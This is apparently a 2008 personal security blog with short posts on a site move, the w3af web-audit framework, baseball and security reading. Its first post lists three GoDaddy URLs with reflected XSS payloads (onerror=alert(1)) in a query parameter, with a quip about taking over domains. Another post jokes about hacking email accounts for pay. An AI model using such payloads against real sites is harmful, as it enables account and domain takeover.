October 30th, 2008

Anyone want to take over a few domains?


https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22

https://dcc.godaddy.com/default.aspx?activeview=transfer&filtertype=3&sa=%22+onerror%3d%27alert(1)%27+%22

https://mya.godaddy.com/myaError.aspx?sa=%27%20onerror=%27alert(1)

It’s scary how full of holes godaddy.com is; this is just a sample of what I saw while I was transferring my domains to webfaction.

October 30th, 2008

I redesigned, well, picked a new theme, and moved the site to a new hosting company today. I have been severely neglecting hiredhacker.com, but life has been filling my time up with ‘real’ things.

I will try and post things from time to time, I just really hate writing. I don’t mind giving technical information or blurts about vulnerabilities, I just really hate all the filler talk bull shit. So from this point forward, I am just going to put up little snippets of things. They should be obvious what they are, but if not, leave a comment and I will try and get to it when I can.

One more thing, PLEASE PLEASE PLEASE stop asking me to hack into someone’s AOL account, hotmail account or anything else for that matter! Yes I CAN do it, but I am not going to… unless you have really deep pockets ;)

-g

May 16th, 2008

w3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

w3af is a great (and getting better) framework that I just decided to start contributing to. I want to get as much attention to these guys as possible as it has a lot of potential to be a very impressive tool.

Hopefully I can set some time aside to actually start throwing some code at em, and if you know python and have an interest in web application security, lend a hand! It’s a great group of guys (and girls?) working on an exciting tool.

May 16th, 2008

A little off topic, but if you are a fan of the Sox, or just like baseball, you gotta see this. Here is Manny’s sprinting-wall-climbing-high-fiving-double-play-catch from a few nights ago:

http://www.mlb.com/media/video_sl.jsp?video=200805142699480

May 16th, 2008

The past few months haven’t exactly been slow for me, hence the lack of new content here. There has been a lot of interesting stuff to happen over the past 2 months, I will try to point out the ones I found most interesting. In no particular order (well, except for Mark Dowd’s inhuman paper, that needs to go first):

Application-Specific Attacks: Leveraging the ActionScript Virtual Machine. Thomas Ptacek from Matasano has some nice posts about Dowd’s paper here and here. Come to think of it, just read the Matasano Blog.

Retsaot is Toaster, Reversed: Quick ‘n Dirty Firmware Reversing. Yea, another Matasano post. Once you read that you’re going to want to get this: BlackBag 0.9.1

For those who still doubt the seriousness of bugs like XSS and CSRF, check out: uTorrent Pwn3d. Without rehashing Rob’s post, he used CSRF to gain control of a machine.

The Bluehat talk A Resident in My Domain has sparked quite a few posts about the details of the attack, and it looks very interesting/serious.

There is of course always OpenRCE.org and sla.ckers.org, and if you’re in the Boston area or are just fans of Dropkick they will be playing at all the Red Sox minor league parks with the Bosstones, more info here.
